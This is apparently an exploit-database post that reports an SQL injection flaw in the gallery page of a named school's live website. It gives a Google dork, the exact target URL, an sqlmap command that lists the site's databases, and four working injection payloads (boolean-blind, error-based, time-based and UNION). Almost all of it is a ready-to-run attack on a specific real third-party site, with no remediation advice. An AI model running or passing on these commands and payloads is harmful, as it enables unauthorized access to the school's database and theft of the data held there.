###############################################################
# Exploit Title : Crescent Public School SQL İnjection
# Descoverd By : http_v0g3l
# Security Risk : Medium
# Google Dork : inurl:sub-gallery.php?id= site:www.crescentpublicschool.in
###############################################################
# Target
https://www.crescentpublicschool.in/sub-gallery.php?id=8
###############################################################
sqlmap -u https://www.crescentpublicschool.in/sub-gallery.php?id=8 --dbs
###############################################################
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-2756' OR 1919=1919#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=8' AND (SELECT 7674 FROM(SELECT COUNT(*),CONCAT(0x7170626271,(SELECT (ELT(7674=7674,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ONZw
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: id=8' OR (SELECT 5309 FROM (SELECT(SLEEP(5)))VToO)-- KrNF
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: id=8' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170626271,0x687970537546506766534e4c4c4748635067616975706f497049634f4867754a546b785042596a4b,0x7178626271),NULL#
###############################################################
